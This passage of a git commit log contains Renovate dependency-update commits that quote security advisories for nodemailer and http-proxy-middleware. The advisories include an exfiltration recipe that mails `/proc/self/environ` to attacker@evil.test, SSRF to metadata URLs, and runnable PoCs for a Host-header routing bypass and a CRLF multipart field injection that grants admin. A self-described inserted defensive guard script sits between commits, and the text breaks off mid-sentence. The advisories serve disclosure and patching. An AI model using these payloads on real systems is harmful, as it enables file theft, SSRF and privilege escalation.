Compare commits

...

319 Commits

Author SHA1 Message Date
renovate[bot] fa488aee64 chore: bump up apple/swift-collections version to from: "1.6.0" (#15136)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | minor | `from: "1.5.1"` → `from: "1.6.0"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

### [`v1.6.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.6.0): Swift Collections 1.6.0

[Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.5.1...1.6.0)

This is a feature release adding several useful operations to ordered
collections, as well as shipping bug fixes that landed since 1.5.1.

The list of supported Swift toolchain versions remains 6.0, 6.1, 6.2,
and 6.3 for now. Note that we intend to retire support for Swift 6.0 and
6.1 in a subsequent release later this year.

#### New `OrderedCollections` operations

We now have several new operations that move existing elements in an
`OrderedSet` or `OrderedDictionary` to a new position within the same
collection:

- `OrderedSet.moveSubrange(_:to:)` and
`OrderedDictionary.moveSubrange(_:to:)` move items at a range of indices
to just before the item at the specified destination index.
- `OrderedSet.move(members:to:)` and `OrderedDictionary.move(keys:to:)`
relocate elements identified by value (or key), preserving the order in
which they're listed.
- `OrderedSet.move(indices:to:)` and
`OrderedDictionary.move(indices:to:)` relocate items at an arbitrary
sequence of indices, preserving their listed order.

#### Bugfixes

- `SortedCollections` \[with the `UnstableSortedCollections` trait]: The
default capacity of B-tree nodes is no longer clamped at 16, improving
performance.
([#257](https://redirect.github.com/apple/swift-collections/issues/257))
- `DequeModule`: The ownership-aware `RigidDeque` and `UniqueDeque`
types no longer hand out invalid spans to clients
([#659](https://redirect.github.com/apple/swift-collections/issues/659))
- `ContainersPreview` \[with the `UnstableContainersPreview` trait]: The
deprecated `Borrow` type alias is now declared with correct
availability.
([#655](https://redirect.github.com/apple/swift-collections/issues/655))

#### What's Changed

- Add missing availability to Borrow by
[@guoye-zhang](https://redirect.github.com/guoye-zhang) in
[#655](https://redirect.github.com/apple/swift-collections/pull/655)
- \[InternalCollectionsUtilities] Fix \_trim returning the wrong buffer
region by
[@adityasingh2400](https://redirect.github.com/adityasingh2400) in
[#659](https://redirect.github.com/apple/swift-collections/pull/659)
- \[SortedCollections] Fix \_BTree default node capacity capping at 16
by
[@adityasingh2400](https://redirect.github.com/adityasingh2400) in
[#661](https://redirect.github.com/apple/swift-collections/pull/661)
- Small benchmarking improvements by
[@lorentey](https://redirect.github.com/lorentey) in
[#664](https://redirect.github.com/apple/swift-collections/pull/664)
- \[OrderedCollections] Add move operations by
[@dnadoba](https://redirect.github.com/dnadoba) in
[#660](https://redirect.github.com/apple/swift-collections/pull/660)
- 1.6.0 prerelease cleanups by
[@lorentey](https://redirect.github.com/lorentey) in
[#665](https://redirect.github.com/apple/swift-collections/pull/665)

#### New Contributors

- [@guoye-zhang](https://redirect.github.com/guoye-zhang) made
their first contribution in
[#655](https://redirect.github.com/apple/swift-collections/pull/655)
- [@adityasingh2400](https://redirect.github.com/adityasingh2400)
made their first contribution in
[#659](https://redirect.github.com/apple/swift-collections/pull/659)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.5.1...1.6.0>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-22 11:49:09 +08:00
DarkSky bb8454e7e1 refactor(native): cache & job runtime (#15139) 2026-06-22 11:48:37 +08:00
renovate[bot] 7ea8800c99 chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`^8.0.11` → `^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/nodemailer/9.0.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/nodemailer/8.0.11/9.0.1?slim=true) |

---

### Nodemailer: Message-level raw option bypasses disableFileAccess/disableUrlAccess, enabling arbitrary file read and full-response SSRF in the delivered message

[GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

<details>
<summary>More information</summary>

#### Details
##### Message-level `raw` option bypasses `disableFileAccess` / `disableUrlAccess`, enabling arbitrary file read and full-response SSRF in the sent message

- **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD
`4e58450eb490e5097a74b2b2cce35a8d9e21856e`)
- **Verdict:** CONFIRMED (local PoC, no network)

##### Summary

Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an
application that passes
**untrusted** message data to the library can forbid that data from
reading local files or
fetching URLs. Every attachment, alternative,
`html`/`text`/`watchHtml`/`amp` and `icalEvent`
content node honors these flags. **The message-level `raw` option does
not.**

`MailComposer.compile()` builds the root MIME node for a `raw` message
**without** threading the
two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href:
'http://169.254.169.254/…' }`
message is read / fetched anyway, and the file or HTTP-response bytes
become the **actual
message that is sent** by every transport (SMTP, SES, sendmail, stream,
JSON). An actor whose
input the application intended to sandbox therefore obtains arbitrary
local-file disclosure and
a full-response SSRF primitive, delivered to a recipient the same actor
can choose.

This is the same vulnerability class as the already-published
jsonTransport advisory
**GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node,
not `normalize()`), and
strictly higher impact: the jsonTransport bug only affected the
locally-returned JSON, whereas
this affects the delivered RFC822 message for all transports.

##### Affected component

- `lib/mail-composer/index.js:34-35` — root cause:
  ```js
  if (this.mail.raw) {
      this.message = new MimeNode('message/rfc822', { newline: this.mail.newline }).setRaw(this.mail.raw);
  }
  ```
  The `MimeNode` is constructed with only `{ newline }`. Compare the
  sibling node builders
  `_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode`
  (`lib/mail-composer/index.js:389-527`), which all pass
  `disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess: this.mail.disableFileAccess`.
- `lib/mime-node/index.js:51-52` — the constructor derives
`this.disableFileAccess`/
`this.disableUrlAccess` solely from its own `options`; children do
**not** inherit a parent's
flags (`createChild`/`appendChild`, lines 175-194, pass options through
verbatim).
- `lib/mime-node/index.js:812` — `setRaw()` content is resolved through
`this._getStream(this._raw)`.
- `lib/mime-node/index.js:984-1010` — `_getStream` reads the file
(`fs.createReadStream`, 995) or
fetches the URL (`nmfetch`, 1009) **only guarded by
`this.disableFileAccess`/`this.disableUrlAccess`**,
  which on the `raw` root node are `false`.
- Reached from the normal send flow at `lib/mailer/index.js:188`
(`mail.message = new MailComposer(mail.data).compile()`), so every
transport is affected.

##### Reachability gate (hop-by-hop)

1. **Source.** Application calls `transporter.sendMail({ raw:
<userControlled> , to: <userControlled> })`
with `disableFileAccess: true` and/or `disableUrlAccess: true`
configured on the transporter
(forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per
message. This is the
exact scenario the flags exist for — the same precondition under which
GHSA-wqvq-jvpq-h66f was
   accepted.
2. **Guard — the access flags.** For attachments the flag is enforced: a
node created by
`_createContentNode` carries `disableFileAccess`, so `_getStream` throws
`EFILEACCESS`.
**Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on
its node, so
`this.disableFileAccess === false` and the guard at `mime-node:985` /
`:999` is skipped.
There is no other validation between `mail.raw` and the read; `raw`
content shapes
(`{path}`, `{href}`, stream, string, buffer) are accepted as-is by
`setRaw`/`_getStream`.
3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or
`nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as
the message body by
   `createReadStream()`, which every transport pipes to its destination
(`smtp-transport:233`, `smtp-pool/pool-resource:208`,
`ses-transport:96`, `sendmail-transport:184`,
   `stream-transport:67`).

No guard blocks the chain; the only guard (the access flags) is
structurally absent on this node.

##### Root cause

Inconsistent enforcement: the access policy is applied per-`MimeNode`
via constructor options and
must be re-passed at every node creation. The `raw`-message shortcut in
`compile()` omits it,
while all five other node builders include it. The flags are therefore
enforced for every content
type *except* the one that lets the caller supply a complete message
body by path/URL.

##### Exploit path

Application that sandboxes untrusted mail input
(`disableFileAccess`/`disableUrlAccess` set):

1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or
any server file:
   `/app/.env`, key material, etc.) and `to: attacker@evil.test`.
2. `compile()` builds the raw root node without the flags; the transport
reads the file and sends
its contents as the message → **arbitrary server-file exfiltration to an
attacker-chosen mailbox.**
3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a
cloud metadata URL →
Nodemailer fetches it server-side and delivers the full response body in
the email →
   **full-response SSRF** (no blind-channel limitation).

##### Impact

- **Confidentiality (High):** arbitrary local file read disclosed in the
outgoing message;
full-response SSRF to internal/metadata endpoints, also disclosed in the
message.
- **Integrity (Low):** attacker-fetched/file content is injected into
the delivered mail.
- The two protective flags an application relies on to contain untrusted
input are silently
  ineffective for `raw`.

##### Preconditions

The application (a) passes `disableFileAccess` and/or `disableUrlAccess`
(the documented sandboxing
flags) and (b) lets untrusted input influence the `raw` field (and, for
maximal disclosure, `to`).
No other configuration is required; all bundled transports are affected.
This mirrors the accepted
precondition of GHSA-wqvq-jvpq-h66f.

##### Severity

- **AV** — message data routinely originates over the network in the
apps these flags protect.
- **AC** — a single crafted `raw` object; deterministic.
- **PR** — the actor is a user whose input the app already treats as
untrusted (the reason the
  flags are set); not fully anonymous in the typical deployment.
- **UI** — no victim interaction.
- **S** — impact within Nodemailer's process scope.
- **C** — arbitrary file read **and** full-response SSRF, both delivered
to an attacker-chosen
recipient. (The sibling jsonTransport advisory used C:L because its leak
stayed in locally-returned
JSON; here the bytes leave the system in the sent message, so C:H is
warranted.)
- **I** — attacker injects fetched/file bytes into the outgoing message.
- **A**.

Note: if a deployment fixes the recipient (`to` not attacker-controlled)
the disclosure channel
narrows and the rating degrades toward the sibling's Medium; the High
rating reflects the
reasonable worst case where `raw` and `to` are both untrusted.

##### Adversarial re-read (attempts to refute)

1. **"`raw` content is by-design trusted, so the flags shouldn't
apply."** Rejected: every other
content path (attachments, alternatives, html/text, icalEvent) honors
the flags, and the
maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this
"untrusted input + flag set"
model. The asymmetry — attachment `{path}` is blocked but `raw:{path}`
is not — is the bug, and
the PoC's CONTROL case proves the flag is otherwise effective on the
same file.
2. **"The raw node inherits the flags via rootNode."** Rejected by code
and by PoC: `compile():35`
constructs the node with `{ newline }` only; `MimeNode` constructor sets
`this.disableFileAccess = !!options.disableFileAccess` → `false`;
`rootNode` is itself; no
   inheritance exists.
3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL
message (`attachments:[{path}]`,
same file, same transporter) returns `EFILEACCESS`; only the
`raw:{path}` message leaks. The
sentinel nonce exists solely in the temp file; the URL nonce is
generated server-side and is only
obtainable by an actual fetch. Both observables are uniquely bound to
the bypass.
4. **"Maybe only jsonTransport (already reported) is affected."**
Rejected: the PoC uses
`streamTransport` and the root cause is in `MailComposer.compile()`
(`mailer:188`), shared by all
   transports; jsonTransport is a different (already-fixed) path.

I could not find any guard that blocks the chain; the finding survives.

##### Proof of concept (safe, benign)

`findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no
network egress (loopback only),
no destructive action. Output:
```
[CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here
[ATTACK]  raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message
[ATTACK]  raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF)
VERDICT: CONFIRMED
```
Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0
= confirmed).

##### Remediation

Thread the access policy onto the `raw` root node, exactly as the other
builders do:
```js
if (this.mail.raw) {
    this.message = new MimeNode('message/rfc822', {
        newline: this.mail.newline,
        disableFileAccess: this.mail.disableFileAccess,
        disableUrlAccess: this.mail.disableUrlAccess
    }).setRaw(this.mail.raw);
}
```
(Defense in depth: `setRaw`/`_getStream` could also refuse
`{path}`/`{href}` raw content when either
flag is set, regardless of how the node was constructed.) Add a
regression test asserting that
`raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS`
when the flags are set, mirroring
the attachment tests.

#### Severity
- CVSS Score: 7.1 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N`

#### References
- [https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f)
- [https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>

### [`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17)

[Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1)

##### Bug Fixes

- enforce disableFileAccess/disableUrlAccess for raw message option
([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2))

### [`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14)

[Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0)

##### ⚠ BREAKING CHANGES

- HTTPS requests made while fetching remote content (attachment
href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now
validate the server's TLS certificate by default. Requests to hosts with
self-signed, expired, or hostname-mismatched certificates that
previously succeeded will now fail. Opt back out per request with
tls.rejectUnauthorized=false (transport options, or a per-attachment
`tls` option).

##### Bug Fixes

- replace deprecated url.parse with a WHATWG URL wrapper
([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed))
- validate TLS certificates by default when fetching remote content
([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d))

</details>

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 22:51:23 +08:00
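
An application-side pre-send check for the `raw` bypass described in GHSA-p6gq-j5cr-w38f above, for deployments that cannot move off an affected version immediately (added example, not Nodemailer's code and not part of the commit). The names `findPolicyViolations` and `guardedSendMail`, the stub transporter and the sample messages are constructed for illustration; treating an `http(s)://` `path` as a URL is this guard's own conservative choice.

```javascript
// Added example: hypothetical application-side guard, not Nodemailer code.
// Field names and the EFILEACCESS / EURLACCESS codes are taken from the advisory text.
const SINGLE_FIELDS = ['raw', 'html', 'text', 'watchHtml', 'amp', 'icalEvent'];
const LIST_FIELDS = ['attachments', 'alternatives'];

// Strings, Buffers and streams carry their bytes inline; only plain objects
// with `path` or `href` ask the library to read a file or fetch a URL.
function isInline(value) {
    return value === null || typeof value !== 'object' ||
        Buffer.isBuffer(value) || typeof value.pipe === 'function';
}

function inspect(field, value, policy, out) {
    if (isInline(value)) return;
    const path = typeof value.path === 'string' ? value.path : null;
    const href = typeof value.href === 'string' ? value.href : null;
    // Assumption of this guard: a path that looks like a URL is treated as one.
    const pathIsUrl = path !== null && /^https?:\/\//i.test(path);
    if (policy.disableUrlAccess && (href !== null || pathIsUrl)) {
        out.push({ field, code: 'EURLACCESS', source: href !== null ? href : path });
    }
    if (policy.disableFileAccess && path !== null && !pathIsUrl) {
        out.push({ field, code: 'EFILEACCESS', source: path });
    }
}

// The flags may be set on the transporter or per message, so either source
// turns the policy on. `raw` is checked the same way as every other field.
function findPolicyViolations(mail, transportPolicy = {}) {
    const policy = {
        disableFileAccess: Boolean(transportPolicy.disableFileAccess || mail.disableFileAccess),
        disableUrlAccess: Boolean(transportPolicy.disableUrlAccess || mail.disableUrlAccess)
    };
    const out = [];
    for (const field of SINGLE_FIELDS) inspect(field, mail[field], policy, out);
    for (const field of LIST_FIELDS) {
        const items = Array.isArray(mail[field]) ? mail[field] : [];
        items.forEach((item, i) => inspect(`${field}[${i}]`, item, policy, out));
    }
    return out;
}

// Reject before the message ever reaches the library's compile step.
function guardedSendMail(transporter, transportPolicy, mail) {
    const violations = findPolicyViolations(mail, transportPolicy);
    if (violations.length > 0) {
        const first = violations[0];
        const err = new Error(`${first.code}: "${first.field}" may not load ${first.source}`);
        err.code = first.code;
        err.violations = violations;
        throw err;
    }
    return transporter.sendMail(mail);
}

// Constructed sample messages and a stub transporter (no mail is sent).
function runDemo() {
    const policy = { disableFileAccess: true, disableUrlAccess: true };
    const transporter = { sendMail: mail => ({ accepted: [mail.to] }) };
    const samples = [
        { to: 'user@example.test', text: 'hello' },
        { to: 'user@example.test', raw: 'Subject: hi\r\n\r\nbody' },
        { to: 'user@example.test', raw: { path: '/tmp/constructed-sentinel.txt' } },
        { to: 'user@example.test', raw: { href: 'http://127.0.0.1:8080/constructed' } },
        { to: 'user@example.test', attachments: [{ path: '/tmp/constructed-sentinel.txt' }] }
    ];
    return samples.map(mail => {
        try {
            guardedSendMail(transporter, policy, mail);
            return 'SENT';
        } catch (err) {
            return err.code;
        }
    });
}

console.log(runDemo().join(' '));
```

The guard complements the upgrade to 9.0.1 rather than replacing it, and the same assertions can serve as a regression test for `raw: {path}` and `raw: {href}`.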
renovate[bot] 16196c6ca1 chore: bump up http-proxy-middleware version to v3.0.7 [SECURITY] (#15131)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware) | [`3.0.5` → `3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7) | ![age](https://developer.mend.io/api/mc/badges/age/npm/http-proxy-middleware/3.0.7?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/http-proxy-middleware/3.0.5/3.0.7?slim=true) |

---

### http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass

[CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) /
[GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

<details>
<summary>More information</summary>

#### Details
##### Summary

`http-proxy-middleware` documents `router` proxy-table entries as host,
path, or host+path selectors, but the host+path implementation uses
unanchored substring matching on attacker-controlled request metadata.
As a result, a crafted `Host` header that is only a superstring match
for a configured host+path key can still route a request to an
unintended backend.

##### Details

Tested code state:

- validated on tag `v4.0.0-beta.5`
- corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358`

Relevant code locations:

- `src/router.ts`
- `src/http-proxy-middleware.ts`

Affected public API:

- `createProxyMiddleware({ router: { 'host/path': 'http://target' } })`

Code explanation:

When a proxy-table router key contains `/`, `getTargetFromProxyTable()`
concatenates attacker-controlled `req.headers.host` and `req.url` into a
single `hostAndPath` string, then accepts the route if:

```ts
hostAndPath.indexOf(key) > -1
```

That is a substring test, not an exact host match plus intended path
match. In the validated PoC, the configured router key is:

```txt
localhost:3000/api
```

but the attacker-controlled host is:

```txt
evillocalhost:3000
```

and the request path is:

```txt
/api
```

The concatenated attacker-controlled string:

```txt
evillocalhost:3000/api
```

still contains the configured router key as a substring, so the
middleware selects the alternate backend even though the host is not
equal to the configured host.

Exploit path:

1. the application enables the documented proxy-table `router` feature
with at least one host+path rule
2. an external attacker sends an ordinary HTTP request with a crafted
`Host` header
3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection
before proxying
4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string
through substring matching
5. the request is proxied to the wrong backend

##### PoC

Create these files in the same working directory and run:

```bash
bash ./run.sh
```

##### File: `run.sh`

```bash
#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"

cleanup() {
  rm -rf "${WORKDIR}"
}
trap cleanup EXIT

echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"

mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"

echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"

echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs
```

##### File: `Dockerfile`

```Dockerfile
FROM node:22-bullseye

WORKDIR /work

COPY repo/package.json repo/yarn.lock /work/repo/

RUN corepack enable \
  && cd /work/repo \
  && yarn install --frozen-lockfile

COPY repo /work/repo
RUN cd /work/repo && yarn build

COPY reproduction /work/reproduction
```

##### File: `verify.mjs`

```js
import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';

import { createProxyMiddleware } from '/work/repo/dist/index.js';

const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';

function listen(server, port) {
  return new Promise((resolve) => {
    server.listen(port, '127.0.0.1', () => resolve());
  });
}

function close(server) {
  return new Promise((resolve, reject) => {
    server.close((err) => {
      if (err) {
        reject(err);
        return;
      }
      resolve();
    });
  });
}

function request(path, host) {
  return new Promise((resolve, reject) => {
    const req = http.request(
      {
        host: '127.0.0.1',
        port: 3000,
        path,
        method: 'GET',
        headers: {
          Host: host,
        },
      },
      (res) => {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) => {
          data += chunk;
        });
        res.on('end', () => {
          resolve({ statusCode: res.statusCode, body: data });
        });
      },
    );
    req.on('error', reject);
    req.end();
  });
}

const defaultBackend = http.createServer((req, res) => {
  res.end('DEFAULT');
});

const secretBackend = http.createServer((req, res) => {
  res.end('SECRET');
});

const proxyMiddleware = createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

const proxyServer = http.createServer((req, res) => {
  proxyMiddleware(req, res, () => {
    res.statusCode = 404;
    res.end('NO_PROXY');
  });
});

try {
  assert.ok(fs.existsSync('/work/repo/dist/index.js'));
  assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));

  await listen(defaultBackend, 3101);
  await listen(secretBackend, 3102);
  await listen(proxyServer, 3000);
  console.log('STEP start-services ok');

  const baseline = await request('/api', 'safe.example:3000');
  assert.equal(baseline.statusCode, 200);
  assert.equal(baseline.body, 'DEFAULT');
  console.log(`STEP baseline-route body=${baseline.body}`);

  const crafted = await request('/api', CRAFTED_HOST);
  assert.equal(crafted.statusCode, 200);
  assert.equal(crafted.body, 'SECRET');
  assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
  console.log(`STEP crafted-route body=${crafted.body}`);

  console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
  await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}
```

This PoC starts:

- one default backend returning `DEFAULT`
- one alternate backend returning `SECRET`
- one proxy using:

```js
createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});
```

It then sends:

1. a baseline request to `/api` with `Host: safe.example:3000`
2. a crafted request to `/api` with `Host: evillocalhost:3000`

Observed result from the validated PoC:

- baseline request: `STEP baseline-route body=DEFAULT`
- crafted request: `STEP crafted-route body=SECRET`
- success marker: `RESULT reproduced host_header_injection router substring match bypass`

The PoC is considered successful only if:

1. the baseline request stays on the default backend
2. the crafted request reaches the alternate backend
3. the crafted host is not equal to the configured router host

##### Impact

This is a backend-selection integrity issue in a documented library
feature. Applications that use host+path router-table rules for backend
segmentation, tenant routing, or separation of public and more sensitive
upstreams can have that routing boundary bypassed by an unauthenticated
external client using an ordinary crafted `Host` header.

#### Severity
- CVSS Score: 6.9 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References
- [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj)
- [https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### http-proxy-middleware: multipart/form-data field injection via unescaped CRLF in `fixRequestBody`

[CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) /
[GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

<details>
<summary>More information</summary>

#### Details
##### Summary
`fixRequestBody()` is the library's documented helper for re-emitting a
request body that was already consumed by a body parser. When the
**outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the
body with `handlerFormDataBodyData()`, which interpolates each
`req.body` key and value directly into the multipart wire format
**without neutralizing CR/LF**:

```js
// dist/handlers/fix-request-body.js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    // key and value are interpolated verbatim; CR/LF in either is not neutralized
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`;
  }
  return str;
}
```

A `\r\n` inside a value (or key) lets an attacker close the current part
and inject an **entirely new form part**. Because the proxy's own body
parser saw a single opaque value, any gateway-side policy or validation
performed on `req.body` is evaluated against a different set of fields
than the upstream backend ultimately parses: a request/parameter
desynchronization across the trust boundary.

By contrast, the sibling output branches are safe: `application/json`
uses `JSON.stringify` (escapes control chars) and
`application/x-www-form-urlencoded` uses `querystring.stringify`
(percent-encodes). Only the multipart branch lacks escaping.

##### Preconditions 
All three must hold; this narrows real-world exposure and is the basis
for `AC:H`:
1. The proxy app populates `req.body` with a **non-multipart** parser
(`express.urlencoded`, `express.json`, or text) so an injected boundary
in a value is **not** split on input.
2. The proxied (outgoing) request is sent as **`multipart/form-data`**
(e.g. an adaptation layer, or any flow that sets the upstream
content-type to multipart), so the vulnerable branch runs.
3. The app calls `fixRequestBody` (the documented pattern for "I
body-parsed, now re-stream"), and an attacker controls at least one body
field value or key.

> Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is
generally **not** exploitable for a *new-field* injection, because the
proxy's multipart parser already splits the injected boundary, so
`req.body` and the backend agree. The desync specifically requires a
non-multipart input parser.

##### Impact
When the preconditions hold, an attacker injects/overrides multipart
fields seen only by the backend:
- **Validation / access-control bypass**: bypass gateway-side field
checks (demonstrated below: a gateway that forbids `role=admin` is
bypassed; backend grants admin).
- **Parameter tampering**: add or overwrite fields the backend trusts
(IDs, flags, prices).
- **File-part injection**: inject a `filename="..."` part into the
upstream multipart stream.
##### Proof of Concept

```js
// npm i http-proxy-middleware@4.0.0   (Node ESM: save as minimal.mjs)
import { fixRequestBody } from 'http-proxy-middleware';

// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.
// The attacker sent  user=alice%0D%0A--BB%0D%0A...  so this ONE field's value holds CRLF:
const req = { readableLength: 0, body: {
  user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--'
}};

// Minimal stand-in for the outgoing proxy request; capture what gets written.
const out = [];
const proxyReq = {
  h: { 'content-type': 'multipart/form-data; boundary=BB' },
  getHeader(n){ return this.h[n.toLowerCase()]; },
  setHeader(n,v){ this.h[n.toLowerCase()] = v; },
  write(d){ out.push(Buffer.from(d)); },
};

fixRequestBody(proxyReq, req);          // library rebuilds the multipart body
console.log(Buffer.concat(out).toString());
```

Output: one input field becomes **two** parts; `role=admin` was injected
via the unescaped CRLF:

```
--BB
Content-Disposition: form-data; name="user"

alice
--BB
Content-Disposition: form-data; name="role"     <-- injected part; never present in req.body's keys
admin
--BB--
```

`req.body` had a single key (`user`), so any gateway policy checking
`req.body.role` passes, yet the backend's multipart parser receives
`role=admin`. On the wire the attacker simply sends, as
`application/x-www-form-urlencoded`:
